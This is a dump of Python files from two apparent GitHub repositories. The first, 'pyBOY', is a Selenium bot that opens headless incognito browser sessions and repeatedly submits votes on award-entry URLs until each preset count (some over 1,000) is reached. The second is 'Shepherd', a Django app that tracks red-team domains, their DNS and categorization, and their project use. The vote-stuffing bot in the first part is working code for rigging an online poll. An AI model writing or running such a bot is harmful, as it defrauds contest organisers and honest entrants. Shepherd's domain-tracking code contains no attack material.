"alphanum_fraction": 0.6217507719993591,
"avg_line_length": 94.09091186523438,
"blob_id": "ea9c5db77ac3ea0b9bd2d717bcf762a29aebc3fe",
"content_id": "fd60ccb836ca88940960939533ac56594dfff5ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5232,
"license_type": "no_license",
"max_line_length": 158,
"num_lines": 55,
"path": "/vote_for_list.py",
"repo_name": "deshudiosh/pyBOY",
"src_encoding": "UTF-8",
"text": "list = [[\"Harmony in Motion\", \"Wall Covering: Contract\", \"https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10916\", 1080],\n [\"Tauko Stool\", \"Seating: Residential/Stool\",\"https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10268\", 280],\n [\"Hybrid Collection Mesh Pattern \", \"Materials, Treatments and Surfaces\",\"https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10760\", 662],\n [\"Drum Teen\", \"Seating: Residental/Accent\",\"https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/8545\", 850],\n [\"Tauko Modular Table\", \"Furniture: Contract/Tables\", \"https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10104\", 762],\n [\"Tauko Modular Table\", \"Furniture: Education\", \"https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10262\", 338],\n [\"Harmony in Motion\", \"Wall Covering: Paper\", \"https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/9569\", 174],\n [\"Tapa\", \"Seating: Contract/Lounge\", \"https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10270\", 558],\n [\"River Snake\", \"Furniture: Outdoor\", \"https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/7775\", 550]]\n\nothers = [['3', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10649', 400],\n ['4', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10503', 400],\n ['5', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/9606', 400],\n ['6', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/9864', 400],\n ['7', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10074', 400],\n ['8', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10934', 400],\n ['9', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10604', 400],\n ['10', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/8237', 400],\n ['11', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/9110', 400],\n ['12', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/9491', 400],\n ['13', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/9618', 400],\n ['14', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/7677', 400],\n ['15', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10057', 400],\n ['16', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/8170', 400],\n ['17', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/9637', 400],\n ['18', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/8749', 400],\n ['19', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10138', 400],\n ['20', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10697', 400],\n ['21', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/8223', 400],\n ['22', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10559', 400],\n ['23', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10050', 400],\n ['24', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/9443', 400],\n ['25', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/8175', 400],\n ['26', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/7523', 400],\n ['27', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/9839', 400],\n ['28', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/9667', 400],\n ['29', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10690', 400],\n ['30', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/8771', 400],\n ['31', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10930', 400],\n ['32', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10428', 400],\n ['33', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/9837', 400],\n ['34', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/11154', 400],\n ['35', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/9431', 400],\n ['36', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/9430', 400],\n ['37', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/10239', 400],\n ['38', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/7658', 400],\n ['39', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/9837 ', 400],\n ['40', '', 'https://boyawards.secure-platform.com/a/gallery/rounds/12/vote/8170', 400]]\n\n\ntest_list = [[\"nazwa\", \"categoria\", \"url\", 1],\n [\"nazwa2\", \"categoria2\", \"url2\", 2]]\n\ndef get_project_list():\n return [{\"name\": e[0], \"category\": e[1], \"url\": e[2], \"num_iter\": e[3]} for e in others]\n\n\n"
},
{
"alpha_fraction": 0.718068540096283,
"alphanum_fraction": 0.7196261882781982,
"avg_line_length": 30.317073822021484,
"blob_id": "4ef0391047c5163d75808256586e382a02e8db2d",
"content_id": "f76aaa04f0923d9358c73cfc02cfb9fb59db89c8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1284,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 41,
"path": "/pyBOY.py",
"repo_name": "deshudiosh/pyBOY",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nimport count_check\nimport logger\nimport vote_for_list\n\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_argument(\"--incognito\")\nchrome_options.add_argument(\"--disable-gpu\")\nchrome_options.add_argument(\"--log-level=3\")\nchrome_options.add_argument(\"--headless\")\n\n\ndef loop(project:dict):\n driver = webdriver.Chrome(executable_path=\"./chromedriver.exe\", chrome_options=chrome_options)\n driver.get(project[\"url\"])\n\n try:\n driver.find_element_by_class_name(\"confirmVote\").click()\n WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.CLASS_NAME, \"voteComplete\")))\n logger.success(project)\n except:\n logger.fail(project)\n\n driver.close()\n\n #TODO: count successes on file copy (so write acces wont fail in logs_counter)\n counted_successes = count_check.get_success_num(project[\"url\"])\n print(counted_successes, \"/\", project[\"num_iter\"])\n\n if counted_successes < project[\"num_iter\"]:\n loop(project)\n else:\n print(\"Finished!\")\n\n\nfor project in vote_for_list.get_project_list():\n loop(project)\n"
},
{
"alpha_fraction": 0.6517857313156128,
"alphanum_fraction": 0.6517857313156128,
"avg_line_length": 28.130434036254883,
"blob_id": "489195333e45b7df0490758a09f0d4b854c5a013",
"content_id": "6e163cf2ec2c4d747b0ffeca62af232eb5eaeafc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 672,
"license_type": "no_license",
"max_line_length": 151,
"num_lines": 23,
"path": "/logger.py",
"repo_name": "deshudiosh/pyBOY",
"src_encoding": "UTF-8",
"text": "import datetime\nimport os\nimport tempfile\n\n\ndef make_log_file(project:dict, success):\n dir = \"./logs\"\n if not os.path.exists(dir):\n os.makedirs(dir)\n file = tempfile.NamedTemporaryFile(dir=dir, delete=False, mode=\"w\")\n file.write(\"\\n\".join([project[\"url\"], str(success), project[\"name\"], project[\"category\"]]))\n file.close()\n\n t = datetime.datetime.now()\n print(\" > \".join([\":\".join([str(t.hour), str(t.minute), str(t.second)]), project[\"name\"],project[\"category\"], (\"success\" if success else \"fail\")]))\n\n\ndef success(project:dict):\n make_log_file(project, success=True)\n\n\ndef fail(project:dict):\n make_log_file(project, success=False)\n\n\n"
}
] | 3 |
fastlorenzo/Shepherd | https://github.com/fastlorenzo/Shepherd | 26d809e3471de3c2ef10210dc550b39a5b7f118b | a51235ecae63f64dc9b5796b7a7a4c544ce58753 | 62db52e196891cfba080bdda8d343c16b20f68da | refs/heads/master | 2020-06-25T02:10:45.348204 | 2019-07-27T13:12:31 | 2019-07-27T13:12:31 | 199,166,282 | 1 | 0 | null | 2019-07-27T13:08:35 | 2019-07-15T07:12:46 | 2019-01-24T18:04:03 | null | [
{
"alpha_fraction": 0.6308540105819702,
"alphanum_fraction": 0.6330578327178955,
"avg_line_length": 33.24528121948242,
"blob_id": "3c30248eb8e8b0a2c126a0addb80ee9afd8c1c03",
"content_id": "da0d15edd7095e4805d14d5eee3d1fac85182a8f",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1815,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 53,
"path": "/modules/dns.py",
"repo_name": "fastlorenzo/Shepherd",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"This module contains the tools required for collecting and parsing DNS records.\"\"\"\n\nimport dns.resolver\nfrom catalog.models import Domain\n\n\nclass DNSCollector(object):\n \"\"\"Class to retrieve DNS records and perform some basic analysis.\"\"\"\n # Setup a DNS resolver so a timeout can be set\n # No timeout means a very, very long wait if a domain has no records\n resolver = dns.resolver.Resolver()\n resolver.timeout = 1\n resolver.lifetime = 1\n\n def __init__(self):\n \"\"\"Everything that should be initiated with a new object goes here.\"\"\"\n pass\n\n def get_dns_record(self, domain, record_type):\n \"\"\"Collect the specified DNS record type for the target domain.\n\n Parameters:\n domain The domain to be used for DNS record collection\n record_type The DNS record type to collect\n \"\"\"\n answer = self.resolver.query(domain, record_type)\n return answer\n\n def parse_dns_answer(self, dns_record):\n \"\"\"Parse the provided DNS record and return a list containing each item.\n\n Parameters:\n dns_record The DNS record to be parsed\n \"\"\"\n temp = []\n for rdata in dns_record.response.answer:\n for item in rdata.items:\n temp.append(item.to_text())\n return \", \".join(temp)\n\n def return_dns_record_list(self, domain, record_type):\n \"\"\"Collect and parse a DNS record for the given domain and DNS record type and then return\n a list.\n\n Parameters:\n domain The domain to be used for DNS record collection\n record_type The DNS record type to collect\n \"\"\"\n record = self.get_dns_record(domain, record_type)\n return self.parse_dns_answer(record)\n"
},
{
"alpha_fraction": 0.5582191944122314,
"alphanum_fraction": 0.568493127822876,
"avg_line_length": 12.318181991577148,
"blob_id": "6b42972b08b5a4239f00403bcca85f3fa3235134",
"content_id": "9a86eb5c77e505e312d21c6a50c0f694ab6cdf8a",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "TOML",
"length_bytes": 292,
"license_type": "permissive",
"max_line_length": 38,
"num_lines": 22,
"path": "/Pipfile",
"repo_name": "fastlorenzo/Shepherd",
"src_encoding": "UTF-8",
"text": "[[source]]\nurl = \"https://pypi.python.org/simple\"\nverify_ssl = true\nname = \"pypi\"\n\n[packages]\ndjango = \"*\"\ndjango-q = \"*\"\nredis = \"*\"\nbs4 = \"*\"\ncymon = \"*\"\nlxml = \"*\"\npillow = \"*\"\npytesseract = \"*\"\nrequests = \"*\"\ndnspython = \"*\"\n\n[dev-packages]\npylint = \"*\"\n\n[requires]\npython_version = \"3.7\""
},
{
"alpha_fraction": 0.5836313962936401,
"alphanum_fraction": 0.5912055373191833,
"avg_line_length": 58.043479919433594,
"blob_id": "03ef83b7cea46a66db62c2bf07339acf1933791f",
"content_id": "9bdb9527055c202f4501e37307fbdc6ff7e82178",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9506,
"license_type": "permissive",
"max_line_length": 225,
"num_lines": 161,
"path": "/catalog/migrations/0001_initial.py",
"repo_name": "fastlorenzo/Shepherd",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.1.5 on 2019-01-15 20:35\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ActivityType',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('activity', models.CharField(help_text='Enter a reason for the use of the domain (e.g. command-and-control)', max_length=100, unique=True)),\n ],\n options={\n 'verbose_name': 'Domain activity',\n 'verbose_name_plural': 'Domain activities',\n 'ordering': ['activity'],\n },\n ),\n migrations.CreateModel(\n name='Client',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(help_text='Enter the name of the client', max_length=100, unique=True, verbose_name='Client Name')),\n ],\n options={\n 'verbose_name': 'Client',\n 'verbose_name_plural': 'Clients',\n 'ordering': ['name'],\n },\n ),\n migrations.CreateModel(\n name='Domain',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(help_text='Enter a domain name', max_length=100, unique=True, verbose_name='Name')),\n ('registrar', models.CharField(help_text='Enter the name of the registrar where this domain is registered', max_length=100, null=True, unique=True, verbose_name='Registrar')),\n ('dns_record', models.CharField(help_text='Enter domain DNS records', max_length=500, null=True, verbose_name='DNS Record')),\n ('health_dns', models.CharField(help_text='Domain health status based on passive DNS (e.g. Healthy, Burned)', max_length=100, null=True, verbose_name='DNS Health')),\n ('creation', models.DateField(help_text='Domain purchase date', verbose_name='Purchase Date')),\n ('expiration', models.DateField(help_text='Domain expiration date', verbose_name='Expiration Date')),\n ('all_cat', models.TextField(help_text='All categories applied to this domain', null=True, verbose_name='All Categories')),\n ('ibm_xforce_cat', models.CharField(help_text='Domain category as determined by IBM X-Force', max_length=100, null=True, verbose_name='IBM X-Force')),\n ('talos_cat', models.CharField(help_text='Domain category as determined by Cisco Talos', max_length=100, null=True, verbose_name='Cisco Talos')),\n ('bluecoat_cat', models.CharField(help_text='Domain category as determined by Bluecoat', max_length=100, null=True, verbose_name='Bluecoat')),\n ('fortiguard_cat', models.CharField(help_text='Domain category as determined by Fortiguard', max_length=100, null=True, verbose_name='Fortiguard')),\n ('opendns_cat', models.CharField(help_text='Domain category as determined by OpenDNS', max_length=100, null=True, verbose_name='OpenDNS')),\n ('trendmicro_cat', models.CharField(help_text='Domain category as determined by TrendMicro', max_length=100, null=True, verbose_name='TrendMicro')),\n ('mx_toolbox_status', models.CharField(help_text='Domain spam status as determined by MX Toolbox', max_length=100, null=True, verbose_name='MX Toolbox Status')),\n ('note', models.TextField(help_text='Domain-related notes, such as thoughts behind its purchase or how/why it was burned or retired', null=True, verbose_name='Notes')),\n ('burned_explanation', models.TextField(help_text='Reasons why the domain\\'s health status is not \"Healthy\"', null=True, verbose_name='Health Explanation')),\n ],\n options={\n 'verbose_name': 'Domain',\n 'verbose_name_plural': 'Domains',\n 'ordering': ['health_status', 'name'],\n 'permissions': (('can_retire_domain', 'Can retire a domain'), ('can_mark_reserved', 'Can reserve a domain')),\n },\n ),\n migrations.CreateModel(\n name='DomainStatus',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('domain_status', models.CharField(help_text='Domain status type (e.g. Available)', max_length=20, unique=True)),\n ],\n options={\n 'verbose_name': 'Domain status',\n 'verbose_name_plural': 'Domain statuses',\n 'ordering': ['domain_status'],\n },\n ),\n migrations.CreateModel(\n name='HealthStatus',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('health_status', models.CharField(help_text='Health status type (e.g. Healthy, Burned)', max_length=20, unique=True)),\n ],\n options={\n 'verbose_name': 'Health status',\n 'verbose_name_plural': 'Health statuses',\n 'ordering': ['health_status'],\n },\n ),\n migrations.CreateModel(\n name='History',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('start_date', models.DateField(auto_now_add=True, help_text='Enter the start date of the project', max_length=100, verbose_name='Start Date')),\n ('end_date', models.DateField(help_text='Enter the end date of the project', max_length=100, verbose_name='End Date')),\n ('note', models.TextField(help_text='Project-related notes, such as how the domain will be used/how it worked out', null=True, verbose_name='Notes')),\n ('slack_channel', models.CharField(help_text=\"Name of the Slack channel to be used for updates for this domain during the project's duration\", max_length=100, null=True, verbose_name='Project Slack Channel')),\n ('activity_type', models.ForeignKey(blank=True, on_delete=django.db.models.deletion.PROTECT, to='catalog.ActivityType')),\n ('client', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='catalog.Client')),\n ('domain', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='catalog.Domain')),\n ('operator', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name': 'Historical project',\n 'verbose_name_plural': 'Historical projects',\n 'ordering': ['client', 'domain'],\n },\n ),\n migrations.CreateModel(\n name='ProjectType',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('project_type', models.CharField(help_text='Enter a project type (e.g. red team, penetration test)', max_length=100, unique=True, verbose_name='Project Type')),\n ],\n options={\n 'verbose_name': 'Project type',\n 'verbose_name_plural': 'Project types',\n 'ordering': ['project_type'],\n },\n ),\n migrations.CreateModel(\n name='WhoisStatus',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('whois_status', models.CharField(help_text='WHOIS privacy status (e.g. Enabled, Disabled)', max_length=20, unique=True)),\n ],\n options={\n 'verbose_name': 'WHOIS status',\n 'verbose_name_plural': 'WHOIS statuses',\n 'ordering': ['whois_status'],\n },\n ),\n migrations.AddField(\n model_name='history',\n name='project_type',\n field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='catalog.ProjectType'),\n ),\n migrations.AddField(\n model_name='domain',\n name='domain_status',\n field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, to='catalog.DomainStatus'),\n ),\n migrations.AddField(\n model_name='domain',\n name='health_status',\n field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, to='catalog.HealthStatus'),\n ),\n migrations.AddField(\n model_name='domain',\n name='last_used_by',\n field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL),\n ),\n migrations.AddField(\n model_name='domain',\n name='whois_status',\n field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, to='catalog.WhoisStatus'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6676275134086609,
"alphanum_fraction": 0.6784922480583191,
"avg_line_length": 26.5060977935791,
"blob_id": "51b5cd42811f9b9074392c3a2823c3accad857dd",
"content_id": "7053b6d99334ca997b1c1c9f3f48e0c05d6fffd1",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4512,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 164,
"path": "/shepherd/settings.py",
"repo_name": "fastlorenzo/Shepherd",
"src_encoding": "UTF-8",
"text": "\"\"\"\nDjango settings for the Shepherd project.\n\nGenerated by 'django-admin startproject' using Django 2.1.4.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/2.1/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/2.1/ref/settings/\n\"\"\"\n\nimport os\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'changeme'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = False\n\nALLOWED_HOSTS = []\n\n# Application definition\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'catalog.apps.CatalogConfig',\n 'django_q',\n]\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'shepherd.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [\n os.path.join(BASE_DIR, 'templates'),\n ],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'shepherd.wsgi.application'\n\n# Database\n# https://docs.djangoproject.com/en/2.1/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n# Password validation\n# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n# Internationalization\n# https://docs.djangoproject.com/en/2.1/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/2.1/howto/static-files/\n\nSTATIC_URL = '/static/'\n\n# Redirect to home URL after login (Default redirects to /accounts/profile/)\nLOGIN_REDIRECT_URL = '/'\n\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n\n# Django Q settings\n\n# Settings to be aware of:\n\n# save_limit: Limits the amount of successful tasks saved to Django. Set to 35 for roughly one\n# month of daily tasks and some domain check-ups.\n\n# timeout: The number of seconds a worker is allowed to spend on a task before it’s terminated.\n# Defaults to None, meaning it will never time out. Can be overridden for individual tasks. Not\n# set globally here because DNS and health checks can take a long time and will be different\n# for everyone.\nQ_CLUSTER = {\n 'name': 'shepherd',\n 'recycle': 500,\n 'save_limit': 35,\n 'queue_limit': 500,\n 'cpu_affinity': 1,\n 'label': 'Django Q',\n 'redis': {\n 'host': '127.0.0.1',\n 'port': 6379,\n 'db': 0, }\n}\n\n# DomainCheck configuration\n# Enter a VirusTotal API key (free or paid)\nDOMAINCHECK_CONFIG = {\n 'virustotal_api_key': '',\n 'sleep_time': 20,\n}\n\n# Slack configuration\nSLACK_CONFIG = {\n 'enable_slack': False,\n 'slack_emoji': ':sheep:',\n 'slack_channel': '#shepherd',\n 'slack_alert_target': '<@cmaddalena>',\n 'slack_username': 'Commander Shepherd',\n 'slack_webhook_url': 'https://hooks.slack.com/services/SLACK_WEBHOOK_ID'\n}"
},
{
"alpha_fraction": 0.6694915294647217,
"alphanum_fraction": 0.6694915294647217,
"avg_line_length": 44.38461685180664,
"blob_id": "b51b267b8008b93fefc5889947112af63fc1dff3",
"content_id": "fa776c504aa1a27b714c5d6273073f60ec0c688d",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2360,
"license_type": "permissive",
"max_line_length": 171,
"num_lines": 52,
"path": "/catalog/forms.py",
"repo_name": "fastlorenzo/Shepherd",
"src_encoding": "UTF-8",
"text": "\"\"\"This contains all of the forms for the catalog application.\"\"\"\n\nimport datetime\n\nfrom django import forms\nfrom django.forms import ModelForm\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom catalog.models import Domain, HealthStatus, DomainStatus, ActivityType, ProjectType, Client, History\n\n\nclass DateInput(forms.DateInput):\n input_type = 'date'\n\n\nclass CheckoutForm(forms.Form):\n \"\"\"Form used for domain checkout. Updates the domain (status) and creates a project entry.\"\"\"\n client = forms.CharField(help_text='Enter a name for the client.')\n start_date = forms.DateField(help_text='Select a start date for the project.')\n end_date = forms.DateField(help_text='Select an end date for the project.')\n project_type = forms.ModelChoiceField(queryset=ProjectType.objects.all(), to_field_name='project_type', help_text='Select the type of project.')\n activity = forms.ModelChoiceField(queryset=ActivityType.objects.all(), to_field_name='activity', help_text='Select how this domain will be used.')\n note = forms.CharField(help_text='Enter a note, such as how this domain will be used.', widget=forms.Textarea, required=False)\n slack_channel = forms.CharField(help_text='Enter a Slack channel with the hashtag where notifications can be sent (e.g. #shepherd, with the hashtag).', required=False)\n\n class Meta:\n widgets = {\n 'start_date': forms.DateInput(attrs={'id': 'datepicker'}),\n 'end_date': forms.DateInput(attrs={'class': 'datepicker'})\n }\n\n def clean_end_date(self):\n \"\"\"Clean and sanitize user input.\"\"\"\n data = self.cleaned_data['end_date']\n # Check if a date is not in the past. \n if data < datetime.date.today():\n raise ValidationError(_('Invalid date: The provided end date is in past'))\n # Return the cleaned data.\n return data\n\n\nclass DomainCreateForm(forms.ModelForm):\n \"\"\"Form used with the DomainCreate CreateView in models.py to allow excluding fields.\"\"\"\n class Meta:\n \"\"\"Metadata for the model form.\"\"\"\n model = Domain\n exclude = ('last_used_by', 'burned_explanation')\n widgets = {\n 'creation': DateInput(),\n 'expiration': DateInput()\n }\n"
},
{
"alpha_fraction": 0.7798994779586792,
"alphanum_fraction": 0.7849246263504028,
"avg_line_length": 80.40908813476562,
"blob_id": "21bce22fdf7ad9a725c477d456279a8f0da02e6c",
"content_id": "3e56ded55e5fb0b30f1d8e8072a81659dbf62106",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 8955,
"license_type": "permissive",
"max_line_length": 578,
"num_lines": 110,
"path": "/README.md",
"repo_name": "fastlorenzo/Shepherd",
"src_encoding": "UTF-8",
"text": "# Shepherd\n\n[](.) [](.)\n\n\n\nShepherd is a Django application written in Python 3.7 and is designed to be used by a team of operators. It keeps track of domain names and each domain's current DNS settings, categorization, project history, and status. The tracked statuses include which domains are: ready to be used, burned/retired, or in use, and which team member checked out each of the active domains.\n\nMore information is available here: https://medium.com/@cmaddy/being-a-good-domain-shepherd-part-2-5e8597c3fe63\n\n## Installation\n\nShepherd requires Redis server and Python 3.7. Install these before proceeding. The exact steps will depend on your operating system, but should be as simple as using an `apt install` or `brew install` command.\n\n### Installing Libraries\n\nAll of Shepherd's Python/Django dependencies are documented in the Pipfile. It is easiest to setup and use a virtual environment using `pipenv`. This is the best option for managing the required libraries and to avoid Python installations getting mixed-up.\n\nDo this:\n\n1. Run: `pip3 install --user pipenv` or `python3 -m pip install --user pipenv`\n2. Run: `git clone https://github.com/GhostManager/Shepherd.git`\n3. Run: cd Shepherd && pipenv install\n4. Start using Shepherd by running: pipenv shell\n\n### Adjusting Settings.py\n\nOnce Django and the other Python libraries are installed, open Shepherd's settings.py file and direct your attention to the `SECRET_KEY` and `DEBUG` variables. You can set `DEBUG` to `True` if you want to test Shepherd or make some changes. It is a good idea to set this to `False` in production, even though Shepherd _should_ only be used as an internal resource.\n\nThe `SECRET_KEY` variable is set to `changeme`. Feel free to generate something and drop it in or use an environment variable. It's usually something like `cg#p$g+j9tax!#a3cup@1$8obt2_+&k3q+pmu)5%asj6yjpkag`.\n\n### Additional Settings\n\n#### API Configuration\n\nSettings.py also stores API information for a few functions. One of Shepherd's core features is updating domain \"health\" data (more on that below). This uses web requests and part of it uses the VirusTotal API. If you do not have one, get a free API key from VirusTotal. Once you have your key add it to the `DOMAINCHECK_CONFIG` settings.\n\nIf you have a paid VirusTotal license and are not subject to the 4 requests per minute limit you can play with the `sleep_time` setting. A 20 second `sleep_time` is still recommended to avoid spewing web requests so fast that your IP address gets blocked with reCAPTCHAs, but you can try reducing it.\n\n#### Slack Configuration\n\nThere is also a `SLACK_CONFIG` settings dictionary. If you have, or can get, a Slack Incoming Webhook you can configure that here to receive some messages when tasks are completed or domains are burned.\n\nYou can set a username and emoji for the bot. Emojis must be set using Slack syntax like `:sheep:`. The username can be anything you could use for a Slack username. The emoji will appear as the bot's avatar in channels.\n\nThe alert target is the message target. You can set this to a blank string, e.g. `''`, but it's mostly useful for targeting users, aliases, or @here/@channel. They must be written as `<!here>`, `<!channel>`, or `<@username>` for them to work as actual notification keywords.\n\nFinally, set the target channel. This might be your `#general` or some other channel. This is the global value that will be used for all messages unless another value is supplied. Currently only the global value from settings.py is used but in the future there will be messages sent for specific projects and events. For example, when a domain is checked-out for use the user can specify a Slack channel to use for notifications and a future version of Shepherd, currently in the works, will use that channel to send project_related notifications to the provided the channel.\n\nIf you do not want to use Slack change `enable_slack` to `False`.\n\nOther notification options are coming soon. Email and 